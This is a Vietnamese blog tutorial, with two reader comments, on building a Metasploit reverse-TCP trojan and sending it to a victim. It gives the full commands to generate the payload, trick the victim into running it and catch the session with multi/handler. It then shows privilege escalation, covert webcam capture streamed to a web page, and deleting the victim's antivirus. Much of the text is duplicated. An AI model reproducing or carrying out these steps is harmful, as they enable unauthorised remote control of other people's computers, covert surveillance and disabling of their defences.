Đầu tiên ta tạo một con trojan để gửi cho victim nhé.
Mở terminal lên type
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.201.132 LPORT=4444 X > /root/Desktop/capuchino.exe
Lệnh này tạo ra một con trojan tên là capuchino.exe trỏ về host là LHOST=192.168.201.132 [IP máy mình ấy ,dùng ifconfig để lấy ip máy mình nhé ] Port lắng nghe là 4444 ,file trojan tạo ra nằm ở Desktop.
Sau khi tạo ra con trojan này thì tìm cách lừa đưa victim chạy :))
Rồi ta mở msfconsole lên
type:msfconsole
tíếp type như sau
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.201.132
ở đây là ip máy mình ấy lhost nghĩa là local host,còn rhost nghĩa là remote host
exploit
nếu victim kích vào con trojan mà mình vừa gửi thì nó sẽ tự connect ,xem dưới đây nó mở một session nè.
bi giờ ta thử xem đã đc chưa nhé.Thử lấy thông tin hệ thống
sysinfo
đầu tiên
getsystem
webcam_list
webcam_snap
meterpreter > run webcam -p /var/www
shell
bi giờ ta thấy giao diện terminal đã trở thành cmd rồi á.
ta thao tác thử xem sao nhé
Mở terminal lên type
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.201.132 LPORT=4444 X > /root/Desktop/capuchino.exe
Lệnh này tạo ra một con trojan tên là capuchino.exe trỏ về host là LHOST=192.168.201.132 [IP máy mình ấy ,dùng ifconfig để lấy ip máy mình nhé ] Port lắng nghe là 4444 ,file trojan tạo ra nằm ở Desktop.
Sau khi tạo ra con trojan này thì tìm cách lừa đưa victim chạy :))
Rồi ta mở msfconsole lên
type:msfconsole
tíếp type như sau
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.201.132
ở đây là ip máy mình ấy lhost nghĩa là local host,còn rhost nghĩa là remote host
exploit
nếu victim kích vào con trojan mà mình vừa gửi thì nó sẽ tự connect ,xem dưới đây nó mở một session nè.
sysinfo
đã đc rồi nhé
ta thử xem webcam trên máy victim nàođầu tiên
getsystem
webcam_list
webcam_snap
meterpreter > run webcam -p /var/www
sau khi chạy webcam xong thì ta xem webcam trực tiếp luôn :)) và webcam mở trực tiếp tại địa chỉ dưới đây .
/var/www/webcam.htm
TIếp theo giả sử như trên máy nạn nhân có cài antivirus thì làm sao ta có thể tắt anti đi,hoặc diệt nó luôn.điều này cũng rất là dễ.chỉ cần ta vào cmd,rồi tìm đến thư mục cài antivirus đi và xóa hết thư mục này đi thì xem như là xong đúng hem.Ví dụ như Avast thì thường nằm ở C:\Program file\Avast.Xóa thư mục này đi là oke.
Thao tác như sau
getsystemshell
bi giờ ta thấy giao diện terminal đã trở thành cmd rồi á.
ta thao tác thử xem sao nhé
Đến đây rồi thì kill antivirus là chuyện đơn giản đúng hem.
tut by capuchino.
bài viết này lấy từ Phạm tuyết băng :v mà không thấy ghi nguồn :v
Trả lờiXóacó thêm autorun nữa thì :3
Trả lờiXóa